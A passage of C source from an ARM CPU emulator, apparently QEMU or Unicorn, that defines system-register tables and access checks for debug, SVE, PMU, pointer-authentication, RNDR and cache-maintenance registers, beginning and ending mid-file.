0, .crn = 1, .crm = 3, .opc2 = 4, .access = PL1_RW, .accessfn = access_tdosa, .type = ARM_CP_NOP }, /* Dummy DBGVCR: Linux wants to clear this on startup, but we don't * implement vector catch debug events yet. */ { .name = "DBGVCR", .cp = 14, .opc1 = 0, .crn = 0, .crm = 7, .opc2 = 0, .access = PL1_RW, .accessfn = access_tda, .type = ARM_CP_NOP }, /* Dummy DBGVCR32_EL2 (which is only for a 64-bit hypervisor * to save and restore a 32-bit guest's DBGVCR) */ { .name = "DBGVCR32_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 2, .opc1 = 4, .crn = 0, .crm = 7, .opc2 = 0, .access = PL2_RW, .accessfn = access_tda, .type = ARM_CP_NOP }, /* Dummy MDCCINT_EL1, since we don't implement the Debug Communications * Channel but Linux may try to access this register. The 32-bit * alias is DBGDCCINT. */ { .name = "MDCCINT_EL1", .state = ARM_CP_STATE_BOTH, .cp = 14, .opc0 = 2, .opc1 = 0, .crn = 0, .crm = 2, .opc2 = 0, .access = PL1_RW, .accessfn = access_tda, .type = ARM_CP_NOP }, REGINFO_SENTINEL }; static const ARMCPRegInfo debug_lpae_cp_reginfo[] = { /* 64 bit access versions of the (dummy) debug registers */ { .name = "DBGDRAR", .cp = 14, .crm = 1, .opc1 = 0, .access = PL0_R, .type = ARM_CP_CONST|ARM_CP_64BIT, .resetvalue = 0 }, { .name = "DBGDSAR", .cp = 14, .crm = 2, .opc1 = 0, .access = PL0_R, .type = ARM_CP_CONST|ARM_CP_64BIT, .resetvalue = 0 }, REGINFO_SENTINEL }; /* Return the exception level to which exceptions should be taken * via SVEAccessTrap. If an exception should be routed through * AArch64.AdvSIMDFPAccessTrap, return 0; fp_exception_el should * take care of raising that exception. * C.f. the ARM pseudocode function CheckSVEEnabled. */ int sve_exception_el(CPUARMState *env, int el) { uint64_t hcr_el2 = arm_hcr_el2_eff(env); if (el <= 1 && (hcr_el2 & (HCR_E2H | HCR_TGE)) != (HCR_E2H | HCR_TGE)) { bool disabled = false; /* The CPACR.ZEN controls traps to EL1: * 0, 2 : trap EL0 and EL1 accesses * 1 : trap only EL0 accesses * 3 : trap no accesses */ if (!extract32(env->cp15.cpacr_el1, 16, 1)) { disabled = true; } else if (!extract32(env->cp15.cpacr_el1, 17, 1)) { disabled = el == 0; } if (disabled) { /* route_to_el2 */ return hcr_el2 & HCR_TGE ? 2 : 1; } /* Check CPACR.FPEN. */ if (!extract32(env->cp15.cpacr_el1, 20, 1)) { disabled = true; } else if (!extract32(env->cp15.cpacr_el1, 21, 1)) { disabled = el == 0; } if (disabled) { return 0; } } /* CPTR_EL2. 
Since TZ and TFP are positive, * they will be zero when EL2 is not present. */ if (el <= 2 && !arm_is_secure_below_el3(env)) { if (env->cp15.cptr_el[2] & CPTR_TZ) { return 2; } if (env->cp15.cptr_el[2] & CPTR_TFP) { return 0; } } /* CPTR_EL3. Since EZ is negative we must check for EL3. */ if (arm_feature(env, ARM_FEATURE_EL3) && !(env->cp15.cptr_el[3] & CPTR_EZ)) { return 3; } return 0; } static uint32_t sve_zcr_get_valid_len(ARMCPU *cpu, uint32_t start_len) { uint32_t end_len; end_len = start_len &= 0xf; if (!test_bit(start_len, cpu->sve_vq_map)) { end_len = find_last_bit(cpu->sve_vq_map, start_len); assert(end_len < start_len); } return end_len; } /* * Given that SVE is enabled, return the vector length for EL. */ uint32_t sve_zcr_len_for_el(CPUARMState *env, int el) { ARMCPU *cpu = env_archcpu(env); uint32_t zcr_len = cpu->sve_max_vq - 1; if (el <= 1) { zcr_len = MIN(zcr_len, 0xf & (uint32_t)env->vfp.zcr_el[1]); } if (el <= 2 && arm_feature(env, ARM_FEATURE_EL2)) { zcr_len = MIN(zcr_len, 0xf & (uint32_t)env->vfp.zcr_el[2]); } if (arm_feature(env, ARM_FEATURE_EL3)) { zcr_len = MIN(zcr_len, 0xf & (uint32_t)env->vfp.zcr_el[3]); } return sve_zcr_get_valid_len(cpu, zcr_len); } static void zcr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { int cur_el = arm_current_el(env); int old_len = sve_zcr_len_for_el(env, cur_el); int new_len; /* Bits other than [3:0] are RAZ/WI. */ QEMU_BUILD_BUG_ON(ARM_MAX_VQ > 16); raw_write(env, ri, value & 0xf); /* * Because we arrived here, we know both FP and SVE are enabled; * otherwise we would have trapped access to the ZCR_ELn register. */ new_len = sve_zcr_len_for_el(env, cur_el); if (new_len < old_len) { aarch64_sve_narrow_vq(env, new_len + 1); } } static const ARMCPRegInfo zcr_el1_reginfo = { .name = "ZCR_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 1, .crm = 2, .opc2 = 0, .access = PL1_RW, .type = ARM_CP_SVE, .fieldoffset = offsetof(CPUARMState, vfp.zcr_el[1]), .writefn = zcr_write, .raw_writefn = raw_write }; static const ARMCPRegInfo zcr_el2_reginfo = { .name = "ZCR_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 2, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_SVE, .fieldoffset = offsetof(CPUARMState, vfp.zcr_el[2]), .writefn = zcr_write, .raw_writefn = raw_write }; static const ARMCPRegInfo zcr_no_el2_reginfo = { .name = "ZCR_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 2, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_SVE, .readfn = arm_cp_read_zero, .writefn = arm_cp_write_ignore }; static const ARMCPRegInfo zcr_el3_reginfo = { .name = "ZCR_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 1, .crm = 2, .opc2 = 0, .access = PL3_RW, .type = ARM_CP_SVE, .fieldoffset = offsetof(CPUARMState, vfp.zcr_el[3]), .writefn = zcr_write, .raw_writefn = raw_write }; void hw_watchpoint_update(ARMCPU *cpu, int n) { CPUARMState *env = &cpu->env; vaddr len = 0; vaddr wvr = env->cp15.dbgwvr[n]; uint64_t wcr = env->cp15.dbgwcr[n]; int mask; int flags = BP_CPU | BP_STOP_BEFORE_ACCESS; if (env->cpu_watchpoint[n]) { cpu_watchpoint_remove_by_ref(CPU(cpu), env->cpu_watchpoint[n]); env->cpu_watchpoint[n] = NULL; } if (!extract64(wcr, 0, 1)) { /* E bit clear : watchpoint disabled */ return; } switch (extract64(wcr, 3, 2)) { case 0: /* LSC 00 is reserved and must behave as if the wp is disabled */ return; case 1: flags |= BP_MEM_READ; break; case 2: flags |= BP_MEM_WRITE; break; case 3: flags |= BP_MEM_ACCESS; break; } /* Attempts to use both MASK and BAS fields simultaneously are * 
CONSTRAINED UNPREDICTABLE; we opt to ignore BAS in this case, * thus generating a watchpoint for every byte in the masked region. */ mask = extract64(wcr, 24, 4); if (mask == 1 || mask == 2) { /* Reserved values of MASK; we must act as if the mask value was * some non-reserved value, or as if the watchpoint were disabled. * We choose the latter. */ return; } else if (mask) { /* Watchpoint covers an aligned area up to 2GB in size */ len = 1ULL << mask; /* If masked bits in WVR are not zero it's CONSTRAINED UNPREDICTABLE * whether the watchpoint fires when the unmasked bits match; we opt * to generate the exceptions. */ wvr &= ~(len - 1); } else { /* Watchpoint covers bytes defined by the byte address select bits */ int bas = extract64(wcr, 5, 8); int basstart; if (extract64(wvr, 2, 1)) { /* Deprecated case of an only 4-aligned address. BAS[7:4] are * ignored, and BAS[3:0] define which bytes to watch. */ bas &= 0xf; } if (bas == 0) { /* This must act as if the watchpoint is disabled */ return; } /* The BAS bits are supposed to be programmed to indicate a contiguous * range of bytes. Otherwise it is CONSTRAINED UNPREDICTABLE whether * we fire for each byte in the word/doubleword addressed by the WVR. * We choose to ignore any non-zero bits after the first range of 1s. */ basstart = ctz32(bas); len = cto32(bas >> basstart); wvr += basstart; } cpu_watchpoint_insert(CPU(cpu), wvr, len, flags, &env->cpu_watchpoint[n]); } void hw_watchpoint_update_all(ARMCPU *cpu) { int i; CPUARMState *env = &cpu->env; /* Completely clear out existing QEMU watchpoints and our array, to * avoid possible stale entries following migration load. */ cpu_watchpoint_remove_all(CPU(cpu), BP_CPU); memset(env->cpu_watchpoint, 0, sizeof(env->cpu_watchpoint)); for (i = 0; i < ARRAY_SIZE(cpu->env.cpu_watchpoint); i++) { hw_watchpoint_update(cpu, i); } } static void dbgwvr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); int i = ri->crm; /* Bits [63:49] are hardwired to the value of bit [48]; that is, the * register reads and behaves as if values written are sign extended. * Bits [1:0] are RES0. */ value = sextract64(value, 0, 49) & ~3ULL; raw_write(env, ri, value); hw_watchpoint_update(cpu, i); } static void dbgwcr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); int i = ri->crm; raw_write(env, ri, value); hw_watchpoint_update(cpu, i); } void hw_breakpoint_update(ARMCPU *cpu, int n) { CPUARMState *env = &cpu->env; uint64_t bvr = env->cp15.dbgbvr[n]; uint64_t bcr = env->cp15.dbgbcr[n]; vaddr addr; int bt; int flags = BP_CPU; if (env->cpu_breakpoint[n]) { cpu_breakpoint_remove_by_ref(CPU(cpu), env->cpu_breakpoint[n]); env->cpu_breakpoint[n] = NULL; } if (!extract64(bcr, 0, 1)) { /* E bit clear : breakpoint disabled */ return; } bt = extract64(bcr, 20, 4); switch (bt) { case 4: /* unlinked address mismatch (reserved if AArch64) */ case 5: /* linked address mismatch (reserved if AArch64) */ qemu_log_mask(LOG_UNIMP, "arm: address mismatch breakpoint types not implemented\n"); return; case 0: /* unlinked address match */ case 1: /* linked address match */ { /* Bits [63:49] are hardwired to the value of bit [48]; that is, * we behave as if the register was sign extended. Bits [1:0] are * RES0. 
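 * As a worked example of the sextract64() idiom used for these
 * registers (the value is illustrative only): writing
 *   bvr = 0x0001000000000003
 * stores sextract64(bvr, 0, 49) & ~3ULL = 0xffff000000000000,
 * i.e. bit 48 is replicated into bits [63:49] and the low two bits
 * are forced to zero.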
The BAS field is used to allow setting breakpoints on 16 * bit wide instructions; it is CONSTRAINED UNPREDICTABLE whether * a bp will fire if the addresses covered by the bp and the addresses * covered by the insn overlap but the insn doesn't start at the * start of the bp address range. We choose to require the insn and * the bp to have the same address. The constraints on writing to * BAS enforced in dbgbcr_write mean we have only four cases: * 0b0000 => no breakpoint * 0b0011 => breakpoint on addr * 0b1100 => breakpoint on addr + 2 * 0b1111 => breakpoint on addr * See also figure D2-3 in the v8 ARM ARM (DDI0487A.c). */ int bas = extract64(bcr, 5, 4); addr = sextract64(bvr, 0, 49) & ~3ULL; if (bas == 0) { return; } if (bas == 0xc) { addr += 2; } break; } case 2: /* unlinked context ID match */ case 8: /* unlinked VMID match (reserved if no EL2) */ case 10: /* unlinked context ID and VMID match (reserved if no EL2) */ qemu_log_mask(LOG_UNIMP, "arm: unlinked context breakpoint types not implemented\n"); return; case 9: /* linked VMID match (reserved if no EL2) */ case 11: /* linked context ID and VMID match (reserved if no EL2) */ case 3: /* linked context ID match */ default: /* We must generate no events for Linked context matches (unless * they are linked to by some other bp/wp, which is handled in * updates for the linking bp/wp). We choose to also generate no events * for reserved values. */ return; } cpu_breakpoint_insert(CPU(cpu), addr, flags, &env->cpu_breakpoint[n]); } void hw_breakpoint_update_all(ARMCPU *cpu) { int i; CPUARMState *env = &cpu->env; /* Completely clear out existing QEMU breakpoints and our array, to * avoid possible stale entries following migration load. */ cpu_breakpoint_remove_all(CPU(cpu), BP_CPU); memset(env->cpu_breakpoint, 0, sizeof(env->cpu_breakpoint)); for (i = 0; i < ARRAY_SIZE(cpu->env.cpu_breakpoint); i++) { hw_breakpoint_update(cpu, i); } } static void dbgbvr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); int i = ri->crm; raw_write(env, ri, value); hw_breakpoint_update(cpu, i); } static void dbgbcr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); int i = ri->crm; /* BAS[3] is a read-only copy of BAS[2], and BAS[1] a read-only * copy of BAS[0]. */ value = deposit64(value, 6, 1, extract64(value, 5, 1)); value = deposit64(value, 8, 1, extract64(value, 7, 1)); raw_write(env, ri, value); hw_breakpoint_update(cpu, i); } static void define_debug_regs(ARMCPU *cpu) { /* Define v7 and v8 architectural debug registers. * These are just dummy implementations for now. */ int i; #ifndef NDEBUG int wrps, brps, ctx_cmps; #else int wrps, brps; #endif ARMCPRegInfo dbgdidr = { .name = "DBGDIDR", .cp = 14, .crn = 0, .crm = 0, .opc1 = 0, .opc2 = 0, .access = PL0_R, .accessfn = access_tda, .type = ARM_CP_CONST, .resetvalue = cpu->isar.dbgdidr, }; /* Note that all these register fields hold "number of Xs minus 1". 
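 * For example, a BRPs field value of 5 advertises six breakpoint
 * register pairs. The arm_num_brps()/arm_num_wrps()/arm_num_ctx_cmps()
 * helpers used below already return the adjusted (field + 1) counts,
 * so they can serve directly as loop bounds.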
*/ brps = arm_num_brps(cpu); wrps = arm_num_wrps(cpu); #ifndef NDEBUG ctx_cmps = arm_num_ctx_cmps(cpu); assert(ctx_cmps <= brps); #else arm_num_ctx_cmps(cpu); #endif define_one_arm_cp_reg(cpu, &dbgdidr); define_arm_cp_regs(cpu, debug_cp_reginfo); if (arm_feature(&cpu->env, ARM_FEATURE_LPAE)) { define_arm_cp_regs(cpu, debug_lpae_cp_reginfo); } for (i = 0; i < brps; i++) { ARMCPRegInfo dbgregs[] = { { .name = "DBGBVR", .state = ARM_CP_STATE_BOTH, .cp = 14, .opc0 = 2, .opc1 = 0, .crn = 0, .crm = i, .opc2 = 4, .access = PL1_RW, .accessfn = access_tda, .fieldoffset = offsetof(CPUARMState, cp15.dbgbvr[i]), .writefn = dbgbvr_write, .raw_writefn = raw_write }, { .name = "DBGBCR", .state = ARM_CP_STATE_BOTH, .cp = 14, .opc0 = 2, .opc1 = 0, .crn = 0, .crm = i, .opc2 = 5, .access = PL1_RW, .accessfn = access_tda, .fieldoffset = offsetof(CPUARMState, cp15.dbgbcr[i]), .writefn = dbgbcr_write, .raw_writefn = raw_write }, REGINFO_SENTINEL }; define_arm_cp_regs(cpu, dbgregs); } for (i = 0; i < wrps; i++) { ARMCPRegInfo dbgregs[] = { { .name = "DBGWVR", .state = ARM_CP_STATE_BOTH, .cp = 14, .opc0 = 2, .opc1 = 0, .crn = 0, .crm = i, .opc2 = 6, .access = PL1_RW, .accessfn = access_tda, .fieldoffset = offsetof(CPUARMState, cp15.dbgwvr[i]), .writefn = dbgwvr_write, .raw_writefn = raw_write }, { .name = "DBGWCR", .state = ARM_CP_STATE_BOTH, .cp = 14, .opc0 = 2, .opc1 = 0, .crn = 0, .crm = i, .opc2 = 7, .access = PL1_RW, .accessfn = access_tda, .fieldoffset = offsetof(CPUARMState, cp15.dbgwcr[i]), .writefn = dbgwcr_write, .raw_writefn = raw_write }, REGINFO_SENTINEL }; define_arm_cp_regs(cpu, dbgregs); } } static void define_pmu_regs(ARMCPU *cpu) { /* * v7 performance monitor control register: same implementor * field as main ID register, and we implement four counters in * addition to the cycle count register. 
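 * The PMCR_EL0 reset value below is assembled accordingly; as a
 * sketch (using the pmcrn variable and the PMCRN_SHIFT/PMCRLC
 * definitions referenced by the code that follows):
 *   (midr & 0xff000000)       implementor field mirrors MIDR
 *   | (pmcrn << PMCRN_SHIFT)  N = 4 event counters
 *   | PMCRLC                  LC: cycle counter behaves as 64-bit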
*/ unsigned int i, pmcrn = 4; ARMCPRegInfo pmcr = { .name = "PMCR", .cp = 15, .crn = 9, .crm = 12, .opc1 = 0, .opc2 = 0, .access = PL0_RW, .type = ARM_CP_IO | ARM_CP_ALIAS, .fieldoffset = offsetoflow32(CPUARMState, cp15.c9_pmcr), .accessfn = pmreg_access, .writefn = pmcr_write, .raw_writefn = raw_write, }; ARMCPRegInfo pmcr64 = { .name = "PMCR_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 9, .crm = 12, .opc2 = 0, .access = PL0_RW, .accessfn = pmreg_access, .type = ARM_CP_IO, .fieldoffset = offsetof(CPUARMState, cp15.c9_pmcr), .resetvalue = (cpu->midr & 0xff000000) | (pmcrn << PMCRN_SHIFT) | PMCRLC, .writefn = pmcr_write, .raw_writefn = raw_write, }; define_one_arm_cp_reg(cpu, &pmcr); define_one_arm_cp_reg(cpu, &pmcr64); for (i = 0; i < pmcrn; i++) { char *pmevcntr_name = g_strdup_printf("PMEVCNTR%d", i); char *pmevcntr_el0_name = g_strdup_printf("PMEVCNTR%d_EL0", i); char *pmevtyper_name = g_strdup_printf("PMEVTYPER%d", i); char *pmevtyper_el0_name = g_strdup_printf("PMEVTYPER%d_EL0", i); ARMCPRegInfo pmev_regs[] = { { .name = pmevcntr_name, .cp = 15, .crn = 14, .crm = 8 | (3 & (i >> 3)), .opc1 = 0, .opc2 = i & 7, .access = PL0_RW, .type = ARM_CP_IO | ARM_CP_ALIAS, .readfn = pmevcntr_readfn, .writefn = pmevcntr_writefn, .accessfn = pmreg_access }, { .name = pmevcntr_el0_name, .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 14, .crm = 8 | (3 & (i >> 3)), .opc2 = i & 7, .access = PL0_RW, .accessfn = pmreg_access, .type = ARM_CP_IO, .readfn = pmevcntr_readfn, .writefn = pmevcntr_writefn, .raw_readfn = pmevcntr_rawread, .raw_writefn = pmevcntr_rawwrite }, { .name = pmevtyper_name, .cp = 15, .crn = 14, .crm = 12 | (3 & (i >> 3)), .opc1 = 0, .opc2 = i & 7, .access = PL0_RW, .type = ARM_CP_IO | ARM_CP_ALIAS, .readfn = pmevtyper_readfn, .writefn = pmevtyper_writefn, .accessfn = pmreg_access }, { .name = pmevtyper_el0_name, .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 14, .crm = 12 | (3 & (i >> 3)), .opc2 = i & 7, .access = PL0_RW, .accessfn = pmreg_access, .type = ARM_CP_IO, .readfn = pmevtyper_readfn, .writefn = pmevtyper_writefn, .raw_writefn = pmevtyper_rawwrite }, REGINFO_SENTINEL }; define_arm_cp_regs(cpu, pmev_regs); g_free(pmevcntr_name); g_free(pmevcntr_el0_name); g_free(pmevtyper_name); g_free(pmevtyper_el0_name); } if (cpu_isar_feature(aa32_pmu_8_1, cpu)) { ARMCPRegInfo v81_pmu_regs[] = { { .name = "PMCEID2", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 0, .crn = 9, .crm = 14, .opc2 = 4, .access = PL0_R, .accessfn = pmreg_access, .type = ARM_CP_CONST, .resetvalue = extract64(cpu->pmceid0, 32, 32) }, { .name = "PMCEID3", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 0, .crn = 9, .crm = 14, .opc2 = 5, .access = PL0_R, .accessfn = pmreg_access, .type = ARM_CP_CONST, .resetvalue = extract64(cpu->pmceid1, 32, 32) }, REGINFO_SENTINEL }; define_arm_cp_regs(cpu, v81_pmu_regs); } if (cpu_isar_feature(any_pmu_8_4, cpu)) { static const ARMCPRegInfo v84_pmmir = { .name = "PMMIR_EL1", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 9, .crm = 14, .opc2 = 6, .access = PL1_R, .accessfn = pmreg_access, .type = ARM_CP_CONST, .resetvalue = 0 }; define_one_arm_cp_reg(cpu, &v84_pmmir); } } /* We don't know until after realize whether there's a GICv3 * attached, and that is what registers the gicv3 sysregs. * So we have to fill in the GIC fields in ID_PFR/ID_PFR1_EL1/ID_AA64PFR0_EL1 * at runtime. 
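 * Concretely, id_pfr1_read() below ORs in bit 28 (the ID_PFR1.GIC
 * field) and id_aa64pfr0_read() ORs in bit 24 (the ID_AA64PFR0.GIC
 * field) whenever env->gicv3state is non-NULL.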
*/ static uint64_t id_pfr1_read(CPUARMState *env, const ARMCPRegInfo *ri) { ARMCPU *cpu = env_archcpu(env); uint64_t pfr1 = cpu->id_pfr1; if (env->gicv3state) { pfr1 |= 1 << 28; } return pfr1; } static uint64_t id_aa64pfr0_read(CPUARMState *env, const ARMCPRegInfo *ri) { ARMCPU *cpu = env_archcpu(env); uint64_t pfr0 = cpu->isar.id_aa64pfr0; if (env->gicv3state) { pfr0 |= 1 << 24; } return pfr0; } /* Shared logic between LORID and the rest of the LOR* registers. * Secure state has already been dealt with. */ static CPAccessResult access_lor_ns(CPUARMState *env) { int el = arm_current_el(env); if (el < 2 && (arm_hcr_el2_eff(env) & HCR_TLOR)) { return CP_ACCESS_TRAP_EL2; } if (el < 3 && (env->cp15.scr_el3 & SCR_TLOR)) { return CP_ACCESS_TRAP_EL3; } return CP_ACCESS_OK; } static CPAccessResult access_lorid(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_is_secure_below_el3(env)) { /* Access ok in secure mode. */ return CP_ACCESS_OK; } return access_lor_ns(env); } static CPAccessResult access_lor_other(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_is_secure_below_el3(env)) { /* Access denied in secure mode. */ return CP_ACCESS_TRAP; } return access_lor_ns(env); } /* * A trivial implementation of ARMv8.1-LOR leaves all of these * registers fixed at 0, which indicates that there are zero * supported Limited Ordering regions. */ static const ARMCPRegInfo lor_reginfo[] = { { .name = "LORSA_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 10, .crm = 4, .opc2 = 0, .access = PL1_RW, .accessfn = access_lor_other, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "LOREA_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 10, .crm = 4, .opc2 = 1, .access = PL1_RW, .accessfn = access_lor_other, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "LORN_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 10, .crm = 4, .opc2 = 2, .access = PL1_RW, .accessfn = access_lor_other, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "LORC_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 10, .crm = 4, .opc2 = 3, .access = PL1_RW, .accessfn = access_lor_other, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "LORID_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 10, .crm = 4, .opc2 = 7, .access = PL1_R, .accessfn = access_lorid, .type = ARM_CP_CONST, .resetvalue = 0 }, REGINFO_SENTINEL }; #ifdef TARGET_AARCH64 static CPAccessResult access_pauth(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { int el = arm_current_el(env); if (el < 2 && arm_feature(env, ARM_FEATURE_EL2) && !(arm_hcr_el2_eff(env) & HCR_APK)) { return CP_ACCESS_TRAP_EL2; } if (el < 3 && arm_feature(env, ARM_FEATURE_EL3) && !(env->cp15.scr_el3 & SCR_APK)) { return CP_ACCESS_TRAP_EL3; } return CP_ACCESS_OK; } static const ARMCPRegInfo pauth_reginfo[] = { { .name = "APDAKEYLO_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 2, .crm = 2, .opc2 = 0, .access = PL1_RW, .accessfn = access_pauth, .fieldoffset = offsetof(CPUARMState, keys.apda.lo) }, { .name = "APDAKEYHI_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 2, .crm = 2, .opc2 = 1, .access = PL1_RW, .accessfn = access_pauth, .fieldoffset = offsetof(CPUARMState, keys.apda.hi) }, { .name = "APDBKEYLO_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 2, .crm = 2, .opc2 = 2, .access = PL1_RW, .accessfn = access_pauth, .fieldoffset = offsetof(CPUARMState, keys.apdb.lo) }, { .name = "APDBKEYHI_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 2, 
.crm = 2, .opc2 = 3, .access = PL1_RW, .accessfn = access_pauth, .fieldoffset = offsetof(CPUARMState, keys.apdb.hi) }, { .name = "APGAKEYLO_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 2, .crm = 3, .opc2 = 0, .access = PL1_RW, .accessfn = access_pauth, .fieldoffset = offsetof(CPUARMState, keys.apga.lo) }, { .name = "APGAKEYHI_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 2, .crm = 3, .opc2 = 1, .access = PL1_RW, .accessfn = access_pauth, .fieldoffset = offsetof(CPUARMState, keys.apga.hi) }, { .name = "APIAKEYLO_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 2, .crm = 1, .opc2 = 0, .access = PL1_RW, .accessfn = access_pauth, .fieldoffset = offsetof(CPUARMState, keys.apia.lo) }, { .name = "APIAKEYHI_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 2, .crm = 1, .opc2 = 1, .access = PL1_RW, .accessfn = access_pauth, .fieldoffset = offsetof(CPUARMState, keys.apia.hi) }, { .name = "APIBKEYLO_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 2, .crm = 1, .opc2 = 2, .access = PL1_RW, .accessfn = access_pauth, .fieldoffset = offsetof(CPUARMState, keys.apib.lo) }, { .name = "APIBKEYHI_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 2, .crm = 1, .opc2 = 3, .access = PL1_RW, .accessfn = access_pauth, .fieldoffset = offsetof(CPUARMState, keys.apib.hi) }, REGINFO_SENTINEL }; static uint64_t rndr_readfn(CPUARMState *env, const ARMCPRegInfo *ri) { uint64_t ret; /* Success sets NZCV = 0000. */ env->NF = env->CF = env->VF = 0, env->ZF = 1; if (qemu_guest_getrandom(&ret, sizeof(ret)) < 0) { /* * ??? Failed, for unknown reasons in the crypto subsystem. * The best we can do is log the reason and return the * timed-out indication to the guest. There is no reason * we know to expect this failure to be transitory, so the * guest may well hang retrying the operation. */ //qemu_log_mask(LOG_UNIMP, "%s: Crypto failure: %s", // ri->name, error_get_pretty(err)); env->ZF = 0; /* NZCV = 0100 */ return 0; } return ret; } /* We do not support re-seeding, so the two registers operate the same. 
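 * Guest-visible behaviour is therefore identical for both encodings;
 * as a sketch (guest code, not additional emulator code):
 *   mrs x0, rndr     success: NZCV = 0b0000, x0 = random bits
 *   mrs x0, rndrrs   same; the re-seed request is ignored
 * and on a host entropy failure NZCV = 0b0100 with x0 = 0, per
 * rndr_readfn() above.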
*/ static const ARMCPRegInfo rndr_reginfo[] = { { .name = "RNDR", .state = ARM_CP_STATE_AA64, .type = ARM_CP_NO_RAW | ARM_CP_SUPPRESS_TB_END | ARM_CP_IO, .opc0 = 3, .opc1 = 3, .crn = 2, .crm = 4, .opc2 = 0, .access = PL0_R, .readfn = rndr_readfn }, { .name = "RNDRRS", .state = ARM_CP_STATE_AA64, .type = ARM_CP_NO_RAW | ARM_CP_SUPPRESS_TB_END | ARM_CP_IO, .opc0 = 3, .opc1 = 3, .crn = 2, .crm = 4, .opc2 = 1, .access = PL0_R, .readfn = rndr_readfn }, REGINFO_SENTINEL }; static void dccvap_writefn(CPUARMState *env, const ARMCPRegInfo *opaque, uint64_t value) { ARMCPU *cpu = env_archcpu(env); struct uc_struct *uc = env->uc; /* CTR_EL0 System register -> DminLine, bits [19:16] */ uint64_t dline_size = 4 << ((cpu->ctr >> 16) & 0xF); uint64_t vaddr_in = (uint64_t) value; uint64_t vaddr = vaddr_in & ~(dline_size - 1); void *haddr; int mem_idx = cpu_mmu_index(env, false); /* This won't be crossing page boundaries */ haddr = probe_read(env, vaddr, dline_size, mem_idx, GETPC()); if (haddr) { ram_addr_t offset; MemoryRegion *mr; /* RCU lock is already being held */ mr = memory_region_from_host(uc, haddr, &offset); if (mr) { // memory_region_do_writeback(mr, offset, dline_size); FIXME } } } static const ARMCPRegInfo dcpop_reg[] = { { .name = "DC_CVAP", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 3, .crn = 7, .crm = 12, .opc2 = 1, .access = PL0_W, .type = ARM_CP_NO_RAW | ARM_CP_SUPPRESS_TB_END, .accessfn = aa64_cacheop_poc_access, .writefn = dccvap_writefn }, REGINFO_SENTINEL }; static const ARMCPRegInfo dcpodp_reg[] = { { .name = "DC_CVADP", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 3, .crn = 7, .crm = 13, .opc2 = 1, .access = PL0_W, .type = ARM_CP_NO_RAW | ARM_CP_SUPPRESS_TB_END, .accessfn = aa64_cacheop_poc_access, .writefn = dccvap_writefn }, REGINFO_SENTINEL }; #endif static CPAccessResult access_predinv(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { int el = arm_current_el(env); if (el == 0) { uint64_t sctlr = arm_sctlr(env, el); if (!(sctlr & SCTLR_EnRCTX)) { return CP_ACCESS_TRAP; } } else if (el == 1) { uint64_t hcr = arm_hcr_el2_eff(env); if (hcr & HCR_NV) { return CP_ACCESS_TRAP_EL2; } } return CP_ACCESS_OK; } static const ARMCPRegInfo predinv_reginfo[] = { { .name = "CFP_RCTX", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 3, .crn = 7, .crm = 3, .opc2 = 4, .type = ARM_CP_NOP, .access = PL0_W, .accessfn = access_predinv }, { .name = "DVP_RCTX", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 3, .crn = 7, .crm = 3, .opc2 = 5, .type = ARM_CP_NOP, .access = PL0_W, .accessfn = access_predinv }, { .name = "CPP_RCTX", .state = ARM_CP_STATE_AA64, .opc0 = 